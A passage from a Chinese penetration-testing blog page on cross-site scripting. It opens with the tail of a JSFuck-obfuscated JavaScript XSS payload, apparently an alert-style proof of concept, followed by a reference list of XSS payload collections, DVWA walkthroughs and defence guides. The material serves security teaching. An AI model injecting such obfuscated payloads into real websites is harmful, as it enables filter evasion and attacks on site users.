+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> <h1>参考资料：</h1> burp使用xssValidator插件 https://blog.csdn.net/u013175604/article/details/84841268 XSS payload大全 https://www.cnblogs.com/xiaozi/p/7268506.html 记一次跨站脚本攻击（XSS）实例 http://blog.sina.com.cn/s/blog_9b7ed3d20102v92u.html DVWA之DOM XSS(DOM型跨站脚本攻击) https://blog.csdn.net/qq_36119192/article/details/82932557 dvwa-XSS(DOM)超详细 https://www.jianshu.com/p/001daa7cf1f5 DVWA XSS(Reflected) 通关教程 https://www.cnblogs.com/yyxianren/p/11381559.html DVWA XSS(Stored) 通关教程 https://www.cnblogs.com/yyxianren/p/11381461.html XSS防御方法总结 https://www.cnblogs.com/digdeep/p/4695348.html Burp suit中 Xssvalidate使用介绍-推荐（XSS自动扫描） https://blog.csdn.net/m0_37268841/article/details/79961956 select下拉框的探索（<option></option>标签中能嵌套使用其它标签吗） https://www.cnblogs.com/tu-0718/p/7112836.html 《XSS跨站脚本攻击剖析与防御》 </div> </div> </div> </div> </div>  <div id="SOHUCS" sid="1363688422685827072"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script>  <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad">  <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div>  <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div>  <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(Penetration,test,安全漏洞,xss,软件测试,web开发)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1773545803021877248.htm" title="使用多线程的方式模拟高并发请求接口，用于自测接口的稳定性【项目】" target="_blank">使用多线程的方式模拟高并发请求接口，用于自测接口的稳定性【项目】</a> 还算善良_ <a class="tag" taget="_blank" href="/search/%E7%A7%81%E6%9C%89%E4%BB%A3%E7%A0%81%E5%BA%93/1.htm">私有代码库</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E5%85%B7%E7%B1%BB/1.htm">工具类</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/list/1.htm">list</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/1.htm">数据结构</a> <div>packagecom.gitee.taven.test;importcom.gitee.taven.ApiResult;importcom.gitee.taven.aop.RepeatSubmitAspect;importorg.slf4j.Logger;importorg.slf4j.LoggerFactory;importorg.springframework.beans.factory.an</div> </li> <li><a href="/article/1773515340869861376.htm" title="npm 搭建 Vite 项目" target="_blank">npm 搭建 Vite 项目</a> 渺小的虫子 <a class="tag" taget="_blank" href="/search/viter/1.htm">viter</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>兼容性注意Vite需要Node.js版本>=12.0.0。1、使用npm安装Viter$npminitvite@latest使用npm初始化项目#npm6.xnpminitvite@latestmy-vue-app--templatevue#npm7+,需要额外的双横线：npminitvite@latestmy-vue-app----templatevue2、配置路由：npminstallvue-</div> </li> <li><a href="/article/1773504261557125120.htm" title="谷歌浏览器驱动Chromedriver（114-120版本）文件以及驱动下载教程" target="_blank">谷歌浏览器驱动Chromedriver（114-120版本）文件以及驱动下载教程</a> pigerr杨 <a class="tag" taget="_blank" href="/search/Python/1.htm">Python</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/drivers/1.htm">drivers</a> <div>ChromeDriver官方网站GitHub||GoogleChromeLabs/chrome-for-testingChromeDriver113-125_JSONChromeforTestingavailability123-125zip白月黑羽Python基础|进阶|Qt图形界面|Django|自动化测试|性能测试|JS语言|JS前端|原理与安装</div> </li> <li><a href="/article/1773403175781466112.htm" title="Python dict字符串转json对象，小数精度丢失问题" target="_blank">Python dict字符串转json对象，小数精度丢失问题</a> 朝如青丝暮成雪 <a class="tag" taget="_blank" href="/search/json/1.htm">json</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div>一前言JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式，dict是Python的一种数据格式。本篇介绍一个float数据转换时精度丢失的案例。二问题描述importjsontest_str1='{"π":3.1415926535897932384626433832795028841971}'test_str2='{"value":10.00000}'print</div> </li> <li><a href="/article/1773371584279543808.htm" title="自动化测试 —— Pytest fixture及conftest详解" target="_blank">自动化测试 —— Pytest fixture及conftest详解</a> 咖啡加剁椒③ <a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/pytest/1.htm">pytest</a><a class="tag" taget="_blank" href="/search/%E5%8A%9F%E8%83%BD%E6%B5%8B%E8%AF%95/1.htm">功能测试</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96%E6%B5%8B%E8%AF%95/1.htm">自动化测试</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E4%BA%BA%E7%94%9F/1.htm">程序人生</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E5%9C%BA%E5%92%8C%E5%8F%91%E5%B1%95/1.htm">职场和发展</a> <div>前言fixture是在测试函数运行前后，由pytest执行的外壳函数。fixture中的代码可以定制，满足多变的测试需求，包括定义传入测试中的数据集、配置测试前系统的初始状态、为批量测试提供数据源等等。fixture是pytest的精髓所在，类似unittest中setup/teardown，但是比它们要强大、灵活很多，它的优势是可以跨文件共享。一、Pytestfixture1.pytestfix</div> </li> <li><a href="/article/1773340994499051520.htm" title="static静态变量的简略解释及其练习" target="_blank">static静态变量的简略解释及其练习</a> JS-JiMao <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>1.当static修饰一个变量时，说白了，就是让该变量的值不能改变，即第二次调用我们不能改变它的值，它的值在第一次就已经确定下来了packagewww.mmm;classStudent{privateStringname;privateintage;privateStringgender;publicstaticStringteachername;publicStudent(){}publicSt</div> </li> <li><a href="/article/1773309278807982080.htm" title="史上最详细的测试用例写作规范" target="_blank">史上最详细的测试用例写作规范</a> 心软小念 <a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E7%94%A8%E4%BE%8B/1.htm">测试用例</a> <div>软件测试用例得出软件测试用例的内容，其次，按照软件测试写作方法，落实到文档中，两者是形式和内容的关系，好的测试用例不仅方便自己和别人查看，而且能帮助设计的时候考虑的更周。一个好的测试用例必须包含足够的内容，将这些内容可以拆分为八个要素：用例编号、测试项目、测试标题、重要级别、预置条件、测试输入、操作步骤、预期输出。1、用例编号1）规则：是由字符和数字组成的字符串，具有唯一性、易识别性。2）不同阶段</div> </li> <li><a href="/article/1773191331473063936.htm" title="JSON与AJAX：网页交互的利器" target="_blank">JSON与AJAX：网页交互的利器</a> 入冉心 <a class="tag" taget="_blank" href="/search/json/1.htm">json</a><a class="tag" taget="_blank" href="/search/ajax/1.htm">ajax</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>在现代Web开发中，JSON（JavaScriptObjectNotation）和AJAX（AsynchronousJavaScriptandXML）是两项不可或缺的技术。它们共同为网页提供了动态、实时的数据交互能力，为用户带来了更加流畅和丰富的体验。本文将详细介绍JSON和AJAX的概念、原理，并通过代码示例展示它们在实际开发中的应用。一、JSON：轻量级的数据交换格式JSON是一种轻量级的数据</div> </li> <li><a href="/article/1772716363006148608.htm" title="Pytest 自定义HOOK函数" target="_blank">Pytest 自定义HOOK函数</a> 咖啡加剁椒④ <a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/pytest/1.htm">pytest</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/%E5%8A%9F%E8%83%BD%E6%B5%8B%E8%AF%95/1.htm">功能测试</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96%E6%B5%8B%E8%AF%95/1.htm">自动化测试</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E4%BA%BA%E7%94%9F/1.htm">程序人生</a> <div>除了系统提过的HOOK函数外，也可以通过自定义HOOK的方式实现想要的功能。首先创建一个py文件，里面定义自己的HOOK函数，主要pytest里面的hook函数必须以pytest开头。#myhook.pydefpytest_myhook(user):"""自定义HOOK函数"""defpytest_myhook2():"""自定义HOOK函数"""其次创建自己的插件类，user类的重写__init</div> </li> <li><a href="/article/1772698992447127552.htm" title="vscode配置go远程linux" target="_blank">vscode配置go远程linux</a> gdut17 <a class="tag" taget="_blank" href="/search/golang/1.htm">golang</a> <div>Toolsenvironment:GOPATH=/root/goInstalling9toolsat/root/go/bininmodulemode.gopkgsgo-outlinegotestsgomodifytagsimplgoplaydlvgolintgoplsInstallinggithub.com/uudashr/gopkgs/v2/cmd/gopkgs(/root/go/bin/gop</div> </li> <li><a href="/article/1772690935436607488.htm" title="webpack-loader详解" target="_blank">webpack-loader详解</a> 奶昔不会射手 <a class="tag" taget="_blank" href="/search/webpack/1.htm">webpack</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/node.js/1.htm">node.js</a> <div>一、loader的分类1.pre:前置loader2.normal:普通loader3.inline:内联loader4.post:后置loader二、执行顺序pre>normal>inline>post,相同类型的loader执行顺序为：从右到左，从下到上module:{rules:[{enforce:"pre",//通过这个参数来定义loader的类型，默认是normal类型test:/\.j</div> </li> <li><a href="/article/1772647114975805440.htm" title="CDH 启停使用HiveServer2" target="_blank">CDH 启停使用HiveServer2</a> 金刚_30bf <div>翻译：https://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_hiveserver2_start_stop.html版本：5.14.2HiveServer2是HiveServer的改进版本，支持Kerberos身份验证和多客户端并发访问。您可以使用Beeline客户端访问HiveServer2。警告：如果以远程模</div> </li> <li><a href="/article/1772632522652450816.htm" title="list分组，多线程处理数据入库" target="_blank">list分组，多线程处理数据入库</a> 墨玉加菲 <a class="tag" taget="_blank" href="/search/java%E5%90%8E%E7%AB%AF/1.htm">java后端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a> <div>需求：解析上传的文件，将文件里的数据放入到list后，验证数据，符合条件的数据入库，分组多线程处理数据，有异常回滚事务（这里使用的是手动事务）先贴代码，这是业务代码packagecom.sh.service.test.impl;importcom.baomidou.mybatisplus.extension.service.impl.ServiceImpl;importcom.sh.constan</div> </li> <li><a href="/article/1772618115931242496.htm" title="python在ui自动化中的一些常见用法" target="_blank">python在ui自动化中的一些常见用法</a> loveyena <div>http://cn.python-requests.org/zh_CN/latest可以查看requests库的说明，pprint(res.json(),width=30)可以对请求的返回值按照json格式化形式进行打印。常见的content-type有application/x-www-form-urlencoded、application/json、application/xml。自动化测试操</div> </li> <li><a href="/article/1772609361777065984.htm" title="基于 JMeter API 开发性能测试平台" target="_blank">基于 JMeter API 开发性能测试平台</a> 咖啡加剁椒⑦ <a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/jmeter/1.htm">jmeter</a><a class="tag" taget="_blank" href="/search/%E5%8A%9F%E8%83%BD%E6%B5%8B%E8%AF%95/1.htm">功能测试</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96%E6%B5%8B%E8%AF%95/1.htm">自动化测试</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E4%BA%BA%E7%94%9F/1.htm">程序人生</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E5%9C%BA%E5%92%8C%E5%8F%91%E5%B1%95/1.htm">职场和发展</a> <div>背景：JMeter是一个功能强大的性能测试工具，若开发一个性能测试平台，用它作为底层执行引擎在合适不过。如要使用其API，就不得不对JMeter整个执行流程，常见的类有清楚的了解。常用的JMeter类和功能的解释：TestPlan类：代表一个测试计划，它是性能测试的顶级元素。您可以使用它来设置全局的测试属性，如测试名称、线程组、监听器等。ThreadGroup类：代表线程组，它定义了并发执行的线程</div> </li> <li><a href="/article/1772511560346959872.htm" title="C#使用ASP.NET Core Razor Pages构建网站（二）" target="_blank">C#使用ASP.NET Core Razor Pages构建网站（二）</a> 林祖师 <a class="tag" taget="_blank" href="/search/C%23/1.htm">C#</a><a class="tag" taget="_blank" href="/search/c%23/1.htm">c#</a><a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>上一篇文章讲了HTTP协议的基本概念、客户端Web开发技术以及ASP.NETCore框架的关键特点和创建项目方法链接：C#使用ASP.NETCoreRazorPages构建网站（一）接下来继续了解ASP.NETCoreRazorPages构建网站的后续内容了解RazorPagesRazorPages允许开发人员轻松地将HTML标记和C#代码混合在一起，这是使用.cshtml扩展名的原因。默认情况下</div> </li> <li><a href="/article/1772435277218906112.htm" title="RockyLinux8 & RockyLinux9安装postgresql16-devel开发包" target="_blank">RockyLinux8 & RockyLinux9安装postgresql16-devel开发包</a> ynzhangyao <a class="tag" taget="_blank" href="/search/postgresql/1.htm">postgresql</a> <div>1、PG的插件扩展有些需要自行编译，需要安装PG开发包2、RockyLinux8安装#创建用户先useraddpostgressudodnfinstall-yhttps://download.postgresql.org/pub/repos/yum/reporpms/EL-8-x86_64/pgdg-redhat-repo-latest.noarch.rpmsudodnf-qymoduledisa</div> </li> <li><a href="/article/1772365288734523392.htm" title="【学习】软件测试中，我们如何有效地跟踪和管理缺陷？" target="_blank">【学习】软件测试中，我们如何有效地跟踪和管理缺陷？</a> 青岛国之信检测 <a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%8E%8B%E5%8A%9B%E6%B5%8B%E8%AF%95/1.htm">压力测试</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E8%A6%86%E7%9B%96%E7%8E%87/1.htm">测试覆盖率</a><a class="tag" taget="_blank" href="/search/%E5%8A%9F%E8%83%BD%E6%B5%8B%E8%AF%95/1.htm">功能测试</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%80%A7%E6%B5%8B%E8%AF%95/1.htm">安全性测试</a> <div>在软件测试中，如何有效地跟踪和管理缺陷？别急，一起来看下小编今日带来的分享。1.缺陷报告建立一个缺陷报告系统，让用户和团队成员能够提交缺陷报告。确保缺陷报告中包括清晰的问题描述、重现步骤、预期结果和实际结果等信息。2.分类和优先级对缺陷进行分类和确定优先级。将缺陷按照严重程度、影响范围和紧急程度等进行分类，根据影响用户体验和产品功能的重要性来确定每个缺陷的优先级。3.设定标准建立一套标准和准则来评</div> </li> <li><a href="/article/1772160676060528640.htm" title="免安装免配置环境的免费 ios 调试工具 sib 来啦" target="_blank">免安装免配置环境的免费 ios 调试工具 sib 来啦</a> 大白菜栋栋 <div>sib是以gidevice为底层实现的iOS调试工具，因为go语言特性，编译好的二进制文件可以直接运行，所以不需要额外配置python环境或者go环境，直接下载3M左右的包解压就可以使用啦！sonic组织也在持续参与建设gidevice。当前迭代了数月，到达了1.1.2版本，基础功能如下：```设备基础信息获取、设备监听App安装卸载、启动终止查看进程信息启动xctest相关，如：启动Wda、Fa</div> </li> <li><a href="/article/1772126389558902784.htm" title="centos7安装jdk17" target="_blank">centos7安装jdk17</a> 小丛的知识窝 <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>AmazonCorretto是亚马逊提供的一个免费的、兼容OpenJDK的JDK发行版。以下是在CentOS7系统上安装AmazonCorrettoJDK17的步骤：下载AmazonCorrettoJDK：wgethttps://corretto.aws/downloads/latest/amazon-corretto-17-x64-linux-jdk.tar.gz解压JDK17文件：在服务器上执</div> </li> <li><a href="/article/1772083971480420352.htm" title="接口测试之测试原则、测试用例、测试流程......" target="_blank">接口测试之测试原则、测试用例、测试流程......</a> 程序员老鹰 <a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7/1.htm">测试工具</a><a class="tag" taget="_blank" href="/search/%E5%8A%9F%E8%83%BD%E6%B5%8B%E8%AF%95/1.htm">功能测试</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E7%94%A8%E4%BE%8B/1.htm">测试用例</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E8%A6%86%E7%9B%96%E7%8E%87/1.htm">测试覆盖率</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a> <div>一、接口的介绍软件测试中，常说的接口有两种：图形用户接口（GUI，人与程序的接口）、应用程序编程接口（API）。接口（API）是系统与系统之间，模块与模块之间或者服务与服务之间相互调用的入口。它的本质：其实就是一种约定，在开发前期，我们约定接口会接收什么数据；在处理完成后，它又会返回什么数据。开发岗位分为前端和后端，他们相互配合完成工作，会协商接口的定义方法。一般后端定义接口，前端调用接口。前后端</div> </li> <li><a href="/article/1772027451875065856.htm" title="网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题" target="_blank">网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题</a> 程序员贵哥 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a> <div>网络安全问题一直是备受关注的话题，其中跨站脚本攻击（XSS）、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击（XSS）。XSS攻击是一种利用网站漏洞，将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本，当用户浏览该网站时，恶意脚本会被执行，从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas</div> </li> <li><a href="/article/1772026318934835200.htm" title="UI Automator 常用 API 整理" target="_blank">UI Automator 常用 API 整理</a> 咖啡加剁椒② <a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/ui/1.htm">ui</a><a class="tag" taget="_blank" href="/search/%E5%8A%9F%E8%83%BD%E6%B5%8B%E8%AF%95/1.htm">功能测试</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E4%BB%B6%E6%B5%8B%E8%AF%95/1.htm">软件测试</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96%E6%B5%8B%E8%AF%95/1.htm">自动化测试</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E4%BA%BA%E7%94%9F/1.htm">程序人生</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E5%9C%BA%E5%92%8C%E5%8F%91%E5%B1%95/1.htm">职场和发展</a> <div>主要类：importandroid.support.test.uiautomator.UiDevice;作用：设备封装类，测试过程中获取设备信息和设备交互。importandroid.support.test.uiautomator.UiObject;作用：所有控件抽象，用于表示一个Android控件。importandroid.support.test.uiautomator.UiObjectN</div> </li> <li><a href="/article/1771990346415276032.htm" title="kotlin基础类型" target="_blank">kotlin基础类型</a> 0246eafe46bd <div>注释单行注释和多行注释kotlin和java一样支持当行（//注释内容）和多行注释（/*注释内容*/），不同的是kotlin的多行注释支持嵌套，例如：privatefuntestComment(msg:String){//单行注释/*多行注释开头/*嵌套的注释内容*/多行注释结尾*/Log.d(TAG,"multilineComment:$msg")}文档注释Kotlin的文档注释和java一样，</div> </li> <li><a href="/article/1771974961003560960.htm" title="Vue项目使用process.env关键字及Vue.config.js配置解决前端跨域问题" target="_blank">Vue项目使用process.env关键字及Vue.config.js配置解决前端跨域问题</a> 百思不得小李 <a class="tag" taget="_blank" href="/search/JS%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/1.htm">JS实战记录</a><a class="tag" taget="_blank" href="/search/vue2%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/1.htm">vue2实战记录</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a> <div>1.process.env是Node.js中的一个环境1.打开命令行查看环境：2.process.env与VueCLI项目VueCli有以下三种运行模式development模式用于vue-cli-serviceservetest模式用于vue-cli-servicetest:unitproduction模式用于vue-cli-servicebuild和vue-cli-servicetest:e2</div> </li> <li><a href="/article/1771933043313934336.htm" title="突破编程_C++_高级教程（单元测试与 Google Test 教程）" target="_blank">突破编程_C++_高级教程（单元测试与 Google Test 教程）</a> breakthrough_01 <a class="tag" taget="_blank" href="/search/%E7%AA%81%E7%A0%B4%E7%BC%96%E7%A8%8B_C%2B%2B_%E9%AB%98%E7%BA%A7%E6%95%99%E7%A8%8B/1.htm">突破编程_C++_高级教程</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>1单元测试简介单元测试（UnitTesting）是一种编程方法，用于验证代码中的最小可测试单元（通常是函数、方法或模块）是否按照预期工作。在C++中，单元测试通常涉及编写一组测试用例，每个用例都调用一个特定的函数或方法，并验证其返回值或行为是否符合预期。单元测试的目的是确保代码的正确性和可靠性，以及减少在后续开发过程中引入错误的可能性。通过编写单元测试，开发人员可以在不影响其他代码的情况下，独立地</div> </li> <li><a href="/article/1771917307946270720.htm" title="字节-安全研究实习生--一面" target="_blank">字节-安全研究实习生--一面</a> Pluto－2003 <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E9%9D%A2%E8%AF%95%E9%A2%98/1.htm">安全面试题</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/1.htm">安全研究</a> <div>`1、你投的岗位是安全研究实习生，你了解我们这边主要是做什么的吗作为安全研究实习生，我理解贵公司主要专注于网络安全领域，致力于保护信息系统免受各种威胁和攻击。这可能包括但不限于以下几个方面：漏洞研究：识别和分析软件、硬件以及网络中的安全漏洞，以便及时修复，防止被恶意利用。威胁情报：收集和分析关于网络威胁的数据，包括恶意软件、攻击者行为模式、漏洞利用技术等，以便更好地理解和防御潜在的网络攻击。安全策</div> </li> <li><a href="/article/1771915797342519296.htm" title="H5 与 App、网页之间的通信" target="_blank">H5 与 App、网页之间的通信</a> 程序员柳随风 <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a> <div>前言本文整理工作中H5嵌入Android、iOS与PC网页后，如何与各端通信。（提供H5端的代码）环境判断constua=navigator.userAgent.toLowerCase()constisAndroid=/android/i.test(ua)constisIos=/iphone|ipod|ios/i.test(ua)constisIpad=/ipad/i.test(ua)consti</div> </li> <li><a href="/article/1771892891426291712.htm" title="【Golang星辰图】抵御恶意攻击：利用Go语言的安全库构建可靠的应用程序" target="_blank">【Golang星辰图】抵御恶意攻击：利用Go语言的安全库构建可靠的应用程序</a> friklogff <a 